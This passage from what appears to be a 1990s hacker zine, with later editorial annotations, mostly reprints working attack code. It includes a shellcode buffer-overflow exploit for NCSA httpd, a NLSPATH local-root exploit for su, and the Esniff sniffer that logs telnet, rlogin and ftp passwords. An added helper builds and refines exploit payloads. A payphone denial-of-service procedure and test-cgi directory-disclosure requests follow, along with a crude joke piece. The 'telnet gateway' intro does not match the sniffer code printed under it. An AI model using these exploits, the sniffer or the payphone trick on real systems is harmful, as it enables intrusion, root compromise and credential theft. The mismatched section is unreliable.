  printf("USER %s\nPASS Yoshemite\n", username);
  return 0;
}

3. Linux HTTPD 1.3 remote : Savage

/*
 * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23
 *
 * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of ToXyn !!!
 *
 * usage:
 *   $ (hackttpd 0; cat) | nc victim 80
 *              |
 *              +--> usually from -1000 to 1000 (try steps of 100)
 *
 * (the printed copy said port 143, which is IMAP; httpd listens on 80)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* A "/" so the request path parses, a NOP sled, shellcode, then "bin/sh"
 * which the shellcode's trailing call picks up as its argument. */
unsigned char shell[] = {
  '/',0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76,
  0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b,
  0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff,
  'b','i','n','/','s','h',
  0   /* terminator added: strcpy() and strlen() below need one */
};

char username[256+8];

/* ASSUMED placeholder: the stack address constant on this line was lost
 * from the printed copy. It is not the author's value; argv[1] shifts it. */
#define RET_ADDR 0xbffff500

int main(int argc, char *argv[])
{
  size_t i;
  int a;
  long val;

  if (argc > 1)
    a = atoi(argv[1]);
  else
    a = 0;

  strcpy(username, (char *)shell);

  /* fill the rest of the request path with the guessed return address,
   * least-significant byte first (i386) */
  for (i = strlen((char *)shell); i + 4 < sizeof(username); i += 4)
  {
    val = RET_ADDR + a;
    username[i]   =  val & 0x000000ff;
    username[i+1] = (val & 0x0000ff00) >> 8;
    username[i+2] = (val & 0x00ff0000) >> 16;
    username[i+3] = (val & 0xff000000) >> 24;
  }
  /* the original wrote username[sizeof(username)], one byte past the array */
  username[sizeof(username) - 1] = 0;

  printf("GET %s\n/bin/bash -i 2>&1;\n", username);
  return 0;
}
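Both Savage exploits above build the same thing by hand: a NOP sled, the shellcode, and then the guessed return address repeated to the end of the buffer, one byte at a time in little-endian order (the cxterm and NLSPATH exploits later in this section use the same layout, with get_sp() plus an offset instead of a fixed address). What neither exploit checks is whether the bytes survive the trip: a 0x00 ends the C string, and a space, CR or LF ends the "USER" or "GET" line before the overflow happens, so the offset you pass on the command line is also choosing which bytes end up in the address. The following is an added example, not code from the zine: it packs the layout into a function and scans the result for transport-unsafe bytes. The 4-byte stub and the two candidate addresses are placeholders, not a working shell or real stack addresses.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Lay out [NOP sled][shellcode][ret ret ret ...] into out[0..total).
 * Addresses are written least-significant byte first, exactly as the
 * pop3d/NCSA exploits do by hand. Returns the number of bytes written
 * (the last 0..3 bytes are left as they were), or 0 if it does not fit. */
size_t build_payload(uint8_t *out, size_t total, size_t sled,
                     const uint8_t *sc, size_t sclen, uint32_t ret)
{
    size_t i;
    if (sled + sclen > total)
        return 0;
    memset(out, 0x90, sled);
    memcpy(out + sled, sc, sclen);
    for (i = sled + sclen; i + 4 <= total; i += 4) {
        out[i]     = (uint8_t)(ret);
        out[i + 1] = (uint8_t)(ret >> 8);
        out[i + 2] = (uint8_t)(ret >> 16);
        out[i + 3] = (uint8_t)(ret >> 24);
    }
    return i;
}

/* Index of the first byte of buf that appears in bad[], or -1 if none.
 * A hit means the transport (a POP3 "USER x" line, an HTTP request line,
 * a C string on the stack) will cut or mangle the payload before it lands. */
long first_bad_byte(const uint8_t *buf, size_t len,
                    const uint8_t *bad, size_t nbad)
{
    size_t i, j;
    for (i = 0; i < len; i++)
        for (j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (long)i;
    return -1;
}

/* Constructed demo inputs. DEMO_STUB is a 4-byte stand-in (xor eax,eax;
 * int 0x80), not a working shell; DEMO_BAD is the byte set that breaks a
 * USER or GET line: NUL, CR, LF, space. */
static const uint8_t DEMO_STUB[] = { 0x31, 0xc0, 0xcd, 0x80 };
static const uint8_t DEMO_BAD[]  = { 0x00, '\r', '\n', ' ' };
#define DEMO_TOTAL 64
#define DEMO_SLED  16

/* Build the demo payload for a candidate return address and report the
 * index of the first transport-unsafe byte, -1 if the payload is clean,
 * -2 if it did not fit. */
long demo_first_bad(uint32_t ret)
{
    uint8_t buf[DEMO_TOTAL];
    if (build_payload(buf, sizeof buf, DEMO_SLED,
                      DEMO_STUB, sizeof DEMO_STUB, ret) != sizeof buf)
        return -2;
    return first_bad_byte(buf, sizeof buf, DEMO_BAD, sizeof DEMO_BAD);
}

int main(void)
{
    /* placeholder addresses: the first has a 0x00 low byte, the second does not */
    uint32_t cand[] = { 0xbffff500u, 0xbffff5a0u };
    size_t k;
    for (k = 0; k < sizeof cand / sizeof cand[0]; k++)
        printf("ret 0x%08x: first bad byte at %ld\n",
               (unsigned)cand[k], demo_first_bad(cand[k]));
    return 0;
}
```

With 0xbffff500 the first address copy starts at index 20 and its low byte is 0x00, so the string the server sees stops right there and the overflow never reaches the saved return address; bumping the guess to 0xbffff5a0 gives a payload with no forbidden bytes. That is the real reason "try offsets in steps of 100" works in practice: it walks the address until all four bytes are clean as well as close enough to the sled.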
4. Telnet gateway : Chaos

/*
  (--------------------------------------------------------)
                   Telnet Gateway by Chaos
  (--------------------------------------------------------)

  Ever worry about some egotistical sysadmin getting pissed off when you
  hack his system, and having him trace it back to your local system? If
  you are like most hackers, even if you are careful and telnet through
  another system first, it is still fairly easy to trace back through.
  Using the following program below you can make it a real bitch for
  anyone to find where you are coming from, let alone what account.

  This program, which has only been tested on Sun OS, will allocate a port
  and set up a telnet gateway. Because this program only allocates a
  socket, in order for someone to trace it back to you, the sysadmin of
  the system it is set up on would have to monitor the socket and see
  where the connection is coming from, which is not very likely, the
  sysadmin already has plenty to do.

  This is setup currently to port 6969 and will run in the background. Be
  sure to call it something that will not gather any suspicion from anyone
  running ps -aux. This will also write to the file log, the date and time
  anyone uses the telnet gateway.

  Have phun!

  Thanks go out to al- for the original source code.
 */

/* Esniff.c */

/* SunOS 4.x headers. The include list was lost from the printed copy and is
 * restored here from the symbols the code uses (NIT, streams, inet). */
#include <stdio.h>
#include <ctype.h>
#include <string.h>

#include <sys/time.h>
#include <sys/file.h>
#include <sys/stropts.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

#include <net/if.h>
#include <net/nit_if.h>
#include <net/nit_buf.h>
#include <net/if_arp.h>

#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/ip_var.h>
#include <netinet/udp_var.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>

#include <netdb.h>
#include <arpa/inet.h>

#define ERR stderr

char    *malloc();                 /* K&R-era declaration; no stdlib.h on SunOS 4 */
char    *device,
        *ProgName,
        *LogName;
FILE    *LOG;
int     debug = 0;

#define NIT_DEV     "/dev/nit"
#define CHUNKSIZE   4096           /* device buffer size */
int     if_fd = -1;
int     Packet[CHUNKSIZE+32];      /* int[] so that Packet + IPHLEN steps 4 bytes at a time */

void Pexit(err,msg)
int err; char *msg;
{ perror(msg);
  exit(err); }

void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg);
  exit(err); }

#define IP          ((struct ip *)Packet)
#define IP_OFFSET   (0x1FFF)
#define SZETH       (sizeof(struct ether_header))
#define IPLEN       (ntohs(ip->ip_len))
#define IPHLEN      (ip->ip_hl)
#define TCPOFF      (tcph->th_off)
#define IPS         (ip->ip_src)
#define IPD         (ip->ip_dst)
#define TCPS        (tcph->th_sport)
#define TCPD        (tcph->th_dport)
#define IPeq(s,t)   ((s).s_addr == (t).s_addr)

#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))

#define MAXBUFLEN  (128)

time_t  LastTIME = 0;

/* one record per (src,dst,sport,dport); keeps the first MAXBUFLEN bytes
 * the client sends, which is where the login and password are */
struct CREC {
     struct CREC *Next,
                 *Last;
     time_t  Time;              /* start time */
     struct in_addr SRCip,
                    DSTip;
     u_int   SRCport,           /* src/dst ports */
             DSTport;
     u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
     u_int   Length;            /* current data length */
     u_int   PKcnt;             /* # pkts */
     u_long  LASTseq;
};

struct CREC *CLroot = NULL;

char *Symaddr(ip)
register struct in_addr ip;
{ register struct hostent *he =
      gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);

  return( (he)?(he->h_name):(inet_ntoa(ip)) );
}

char *TCPflags(flgs)
register u_char flgs;
{ static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')

  SFL(0,TH_FIN, 'F');
  SFL(1,TH_SYN, 'S');
  SFL(2,TH_RST, 'R');
  SFL(3,TH_PUSH,'P');
  SFL(4,TH_ACK, 'A');
  SFL(5,TH_URG, 'U');
  iobuf[6]=0;
  return(iobuf);
}

char *SERVp(port)
register u_int port;
{ static char buf[10];
  register char *p;

   switch(port) {
     case IPPORT_LOGINSERVER: p="rlogin"; break;
     case IPPORT_TELNET:      p="telnet"; break;
     case IPPORT_SMTP:        p="smtp"; break;
     case IPPORT_FTP:         p="ftp"; break;
     default: sprintf(buf,"%u",port); p=buf; break;
   }
   return(p);
}

char *Ptm(t)
register time_t *t;
{ register char *p = ctime(t);
  p[strlen(p)-6]=0;          /* strip " YYYY\n" */
  return(p);
}

char *NOWtm()
{ time_t tm;
  time(&tm);
  return( Ptm(&tm) );
}

#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))

/* add an item */
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  register struct CREC *CLtmp = \
        (struct CREC *)malloc(sizeof(struct CREC)); \
  time( &(CLtmp->Time) ); \
  CLtmp->SRCip.s_addr = SIP.s_addr; \
  CLtmp->DSTip.s_addr = DIP.s_addr; \
  CLtmp->SRCport = SPORT; \
  CLtmp->DSTport = DPORT; \
  CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  CLtmp->PKcnt = 1; \
  CLtmp->Next = CLroot; \
  CLtmp->Last = NULL; \
  if(CLroot != NULL) CLroot->Last = CLtmp; /* fix: the original never set the old root's Last, so END_NODE could drop the rest of the list */ \
  CLroot = CLtmp; \
}

struct CREC *GET_NODE(Sip,SP,Dip,DP)
register struct in_addr Sip,Dip;
register u_int SP,DP;
{ register struct CREC *CLr = CLroot;

  while(CLr != NULL) {
    if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
        IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
            break;
    CLr = CLr->Next;
  }
  return(CLr);
}

#define ADDDATA_NODE(CL,DATA,LEN) { \
 bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
 CL->Length += LEN; \
}

#define PR_DATA(dp,ln) {    \
  register u_char lastc=0; \
  while(ln-- >0) { \
     if(*dp < 32) {  \
        switch(*dp) { \
            case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
                        break; \
            case '\r': \
            case '\n': fprintf(LOG,"\n     : "); \
                        break; \
            default  : fprintf(LOG,"^%c",(*dp + 64)); \
                        break; \
        } \
     } else { \
        if(isprint(*dp)) fputc(*dp,LOG); \
        else fprintf(LOG,"(%d)",*dp); \
     } \
     lastc = *dp++; \
  } \
  fflush(LOG); \
}

void END_NODE(CLe,d,dl,msg)
register struct CREC *CLe;
register u_char *d;
register int dl;
register char *msg;
{
   fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
   fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
   fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
   fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
                                        NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
   fprintf(LOG," DATA: ");
    { register u_int i = CLe->Length;
      register u_char *p = CLe->Data;
      PR_DATA(p,i);
      PR_DATA(d,dl);
    }

   fprintf(LOG,"\n-- \n");
   fflush(LOG);

   if(CLe->Next != NULL)
    CLe->Next->Last = CLe->Last;
   if(CLe->Last != NULL)
    CLe->Last->Next = CLe->Next;
   else
    CLroot = CLe->Next;
   free(CLe);
}

/* 30 mins (x 60 seconds) */
#define IDLE_TIMEOUT 1800
/* the body of this macro and the head of filter() below were partly lost
 * from the printed copy and are reconstructed to match the surviving lines */
#define IDLE_NODE() { \
  time_t tm; \
  time(&tm); \
  if(LastTIME<tm) { \
     register struct CREC *CLe = CLroot, *CLt = CLroot; \
     LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
     while(CLe) { \
        CLt = CLe->Next; \
        if(CLe->Time <tm) \
           END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
        CLe = CLt; \
     } \
  } \
}

/* called for every chunk the NIT device hands us; keeps TCP to the
 * telnet, rlogin and ftp ports, starting a record on SYN and closing it
 * on FIN/RST, data limit or idle timeout */
void filter(cp, pktlen)
register char *cp;
register u_int pktlen;
{
 register struct ip     *ip;
 register struct tcphdr *tcph;

 { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);

   if(EtherType < 0x600) {
     EtherType = *(u_short *)(cp + SZETH + 6);
     cp+=8; pktlen-=8;
   }

   if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
      return;
 }

    /* ugh, gotta do an alignment :-( */
 bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));

 ip = (struct ip *)Packet;
 if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
    return;
 tcph = (struct tcphdr *)(Packet + IPHLEN);

 if(!( (TCPD == IPPORT_TELNET) ||
       (TCPD == IPPORT_LOGINSERVER) ||
       (TCPD == IPPORT_FTP)
   )) return;

 { register struct CREC *CLm;
   register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
   register u_char *p = (u_char *)Packet;

   p += ((IPHLEN * 4) + (TCPOFF * 4));

   if(debug) {
     fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
     fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
     fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
   }

   if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {

      CLm->PKcnt++;

      if(length>0) {
        if( (CLm->Length + length) < MAXBUFLEN ) {
          ADDDATA_NODE( CLm, p,length);
        } else {
          END_NODE( CLm, p,length, "DATA LIMIT");
          CLm = NULL;   /* fix: END_NODE freed the record; the original then touched it on FIN/RST */
        }
      }

      if(CLm && TCPFL(TH_FIN|TH_RST)) {
          END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
      }

   } else {

      if(TCPFL(TH_SYN)) {
         ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
      }

   }

   IDLE_NODE();

 }

}

/* signal handler */
void death()
{ register struct CREC *CLe;

    while(CLe=CLroot)
        END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");

    fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
    fflush(LOG);
    if(LOG != stdout)
        fclose(LOG);
    exit(1);
}

/* opens network interface, performs ioctls and reads from it,
 * passing data to filter function */
void do_it()
{
    int cc;
    char *buf;
    u_short sp_ts_len;

    if(!(buf=malloc(CHUNKSIZE)))
        Pexit(1,"Eth: malloc");

/* this /dev/nit initialization code pinched from etherfind */
  {
    struct strioctl si;
    struct ifreq    ifr;
    struct timeval  timeout;
    u_int  chunksize = CHUNKSIZE;
    u_long if_flags  = NI_PROMISC;

    if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
        Pexit(1,"Eth: nit open");

    if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
        Pexit(1,"Eth: ioctl (I_SRDOPT)");

    si.ic_timout = INFTIM;

    if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
        Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");

    timeout.tv_sec = 1;
    timeout.tv_usec = 0;
    si.ic_cmd = NIOCSTIME;
    si.ic_len = sizeof(timeout);
    si.ic_dp  = (char *)&timeout;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");

    si.ic_cmd = NIOCSCHUNK;
    si.ic_len = sizeof(chunksize);
    si.ic_dp  = (char *)&chunksize;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");

    strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
    ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
    si.ic_cmd = NIOCBIND;
    si.ic_len = sizeof(ifr);
    si.ic_dp  = (char *)&ifr;        /* "&ifr" came through the printed copy as an HTML entity */
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");

    si.ic_cmd = NIOCSFLAGS;          /* promiscuous mode: every frame on the wire, not just ours */
    si.ic_len = sizeof(if_flags);
    si.ic_dp  = (char *)&if_flags;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");

    if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
        Pexit(1,"Eth: ioctl (I_FLUSH)");
  }

    while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
        register char *bp = buf,
                      *bufstop = (buf + cc);

        while (bp < bufstop) {
            register char *cp = bp;
            register struct nit_bufhdr *hdrp;

            hdrp = (struct nit_bufhdr *)cp;
            cp += sizeof(struct nit_bufhdr);
            bp += hdrp->nhb_totlen;
            filter(cp, (u_long)hdrp->nhb_msglen);
        }
    }
    Pexit((-1),"Eth: read");
}

 /* Authorize your proogie,generate your own password and uncomment here */
/* #define AUTHPASSWD "EloiZgZejWyms" */

/*
void getauth()
{ char *buf,*getpass(),*crypt();
  char pwd[21],prmpt[81];

    strcpy(pwd,AUTHPASSWD);
    sprintf(prmpt,"(%s)UP? ",ProgName);
    buf=getpass(prmpt);
    if(strcmp(pwd,crypt(buf,pwd)))
        exit(1);
}
*/

int main(argc, argv)
int argc;
char **argv;
{
    char   cbuf[BUFSIZ];
    struct ifconf ifc;
    int    s,
           ac=1,
           backg=0;

    ProgName=argv[0];

 /*     getauth(); */

    LOG=NULL;
    device=NULL;
    /* option parsing and interface discovery were partly lost from the
     * printed copy and are reconstructed to match the surviving lines */
    while((ac<argc) && (argv[ac][0] == '-')) {
       register char ch = argv[ac++][1];
       switch(toupper(ch)) {
            case 'I': device=argv[ac++];
                      break;
            case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
                         Zexit(1,"Output file cant be opened\n");
                      break;
            case 'B': backg=1;
                      break;
            case 'D': debug=1;
                      break;
            default : fprintf(ERR,
                        "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
                            ProgName);
                      exit(1);
       }
    }

    if(!device) {
        if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
            Pexit(1,"Eth: socket");

        ifc.ifc_len = sizeof(cbuf);
        ifc.ifc_buf = cbuf;
        if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
            Pexit(1,"Eth: ioctl");

        close(s);
        device = ifc.ifc_req->ifr_name;   /* first configured interface */
    }

    fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
    fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
            (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");

    if(!LOG)
        LOG=stdout;

    signal(SIGINT, death);
    signal(SIGTERM,death);
    signal(SIGKILL,death);     /* cannot actually be caught; harmless */
    signal(SIGQUIT,death);

    if(backg && debug) {
         fprintf(ERR,"[Cannot bg with debug on]\n");
         backg=0;
    }

    if(backg) {
        register int s;

        if((s=fork())>0) {
           fprintf(ERR,"[pid %d]\n",s);
           exit(0);
        } else if(s<0)
           Pexit(1,"fork");

        if( (s=open("/dev/tty",O_RDWR))>0 ) {
                ioctl(s,TIOCNOTTY,(char *)NULL);
                close(s);
        }
    }
    fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
    fflush(LOG);

    do_it();
    return 0;
}

8. Linux nlspath exploit : Solar Designer

/*
 * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
 * by Solar Designer, 1997.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* setuid/setgid to root, then execve("/bin/sh"): the shellcode scans
 * forward for the '/' and '0' markers and NUL-terminates the path itself,
 * so the string needs no embedded zero bytes. */
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";

/* i386 only: returns the caller's stack pointer in eax */
char *get_sp()
{
  asm("movl %esp,%eax");
}

#define bufsize 2048

char buffer[bufsize];

int main()
{
  int i;

  /* addresses first, then overwrite the front with a NOP sled and the
   * shellcode; su copies NLSPATH into a fixed stack buffer in libc's
   * message catalog code and walks off the end of it */
  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - 3072;

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  /* later glibc strips NLSPATH (with LD_PRELOAD, LD_LIBRARY_PATH and
   * friends) from the environment of setuid programs for exactly this reason */
  setenv("NLSPATH", buffer, 1);
  execl("/bin/su", "/bin/su", NULL);
  return 0;
}

===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C.
]===========[ FONES / SCANNING ]== =============================================================================== 1. How to fuck over a UK payphone : so1o / NightRage We found this out by total coincidence at the Bristol 2600 meeting... This is a DoS (Denial of Service) attack for payphones in the UK, it uses the national test number (175) and your local test number - at your local excahnge, which in Bristol is 17070 (I think), so you do the following... 1) Approach the telephone booth. 2) Pick up the handset. 3) Put 10p into the phone - you will get this back. 4) Dial your local excahnge test number. 5) Put the handset down. 6) Pick the handset up. 7) Dial your national exchange test number. 8) Listen to all the noise and shit for about 10 seconds. 9) Put the handset down. The LCD display in the booth will now say words to the following.. "BT Apologise, but this telephone is out of order." About 30 seconds later, the phone will return back to normal. 2. Radio link for TI-85 calculators : Michael Jan ******************************************************************** -- INTRO ----------------------------------------------------------- ******************************************************************** RT LINK (Radio transfer link) basicly functions like a regular TI-LINK except it is wireless! The parts for making this link will cost around $15 - $20 dollars for a pair, and the frequency is adjustable. You may post & share this plan. But please give me credit for my work (at least put my name, Michael Jan). I TESTED this plan, they transfer within the range of 30 to 50 feet. (Which is more than what I expected, great!). The following are the parts you need, you can obtain them at R.S. 
********************************************************************
-- PARTS -----------------------------------------------------------
********************************************************************

PARTS              VALUE                      QUANTITY
--------------------------------------------------------------------
TI LINK            [TI BLACK LINK]            1 (Cut Into 2)
Capacitors         [470 pF]                   2
                   [100 pF]                   2
                   [10 pF]                    2
                   [4 pF]                     4
                   [.01 uF]                   2
                   [10 uF]                    4
Resistors          [10K Ohm]                  2
                   [1.2K Ohm]                 2
                   [33K Ohm]                  4
                   [100 Ohm]                  2
                   [180 Ohm]                  2
Transistors        [2SC1923]                  4
Coil(L)            [.27-.3]                   4
Battery Holder     [Holds 2 AA or 2 AAA]      2
Batteries          [AA or AAA]                4
Diode              [Germanium]                2
Copper Wire        [2 Feet]                   2 (Ant.)

*****************************************************************************
*** NOTE The Parts Are For TWO RT LINKs, Because They ONLY WORK In PAIRS! ***
*****************************************************************************

*******************************************************************
-- DIRECTIONS -----------------------------------------------------
*******************************************************************

1. Print Out The Schematic Diagram (The Included GIF File), It Is Easier To Put Parts Together.

2. Put The Parts Together By Following The Diagram (VERY IMPORTANT).

   *** NOTE For Schematic Diagram --
       Red Wire   = From TI Link
       White Wire = From TI Link
       (Copper Wire From TI Link Will Not Be Used)
       R = Resistors
       C = Capacitors
       T = Transistors
       Connect +, - To Battery Holder

3. Adjust The 4 Coil(L)s Clockwise To MAX On Both RT Links. This Will Adjust The Frequencies On Both LINKs To Be The Same. (You Can Adjust To Any Frequency You Like Between 90MHz-100MHz)

4. Put 2 Batteries Into Both Holders

5. THAT'S IT!!!, ENJOY YOUR RT-LINK !!!! =)

===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================

1. Test-cgi holes : so1o

Example exploit:
----------------

Below are examples, nc is netcat from avian.org. You can always just telnet to port 80 and type in the GET... command. The hole is in the test-cgi shell script that shipped with NCSA httpd (and the Apache releases that inherited it): it echoes $QUERY_STRING without quotes, so the shell performs filename expansion on whatever the client sends, and a query of /* or * comes back as a listing of / or of the cgi-bin directory. Quoting the variable in the script, or removing test-cgi, closes it.

machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80
CGI/1.0 test script report:

argc is 1. argv is /\*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

...Or to see what other cgi-goodies are still floating around...

machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80
CGI/1.0 test script report:

argc is 1. argv is \*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html mail-query mail-query-2 majordomo majordomo.cf marker.cgi menu message.cgi munger.cgi munger.note ncsa-default.tar post-query query smartlist.cf src subscribe.cf test-cgi uptime
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

2. Tree raping : digitalboy [DD]

Tree raping can be an exciting and fulfilling hobby, as long as the proper safety precautions are taken. This file will try to outline the process of tree raping, as well as give you some background on the sport of tree raping.

\|/ History \|/

Tree raping originated in Eastern Africa long before history was recorded.
It was practiced by tribes of natives who used it as a test to determine the tribal chief. He who could rape the most trees was surely the most powerful, and therefore the rightful leader. The sexual molestation of trees was kept a tribal secret, and no outsiders learned of the practice until the late 1800's when Spanish explorer Hernando Ferdinando Enriquez happened to witness the event. He was killed by the natives he had been watching, but before his death he wrote of it in his journal. In 1937, a nun found the journal and the methods of tree raping were spread to the rest of the civilized world. \|/ Preparation \|/ Tree raping is not something you can just go out and do. You must be prepared. First and foremost, find a forest. While some of the best trees are found in urban settings, violating them will usually land you in the city jail. Not to mention the public ridicule. No, this is an activity that must take place in a relatively secluded part of a forest. Bring a few friends if that is your fancy, but large tree raping orgies usually lessen the enjoyment. You must also bring a large vat of maple syrup and possible climbing equipment, this will be explained later. \|/ Tree Selection \|/ Picking the right tree to violate is essential. If you 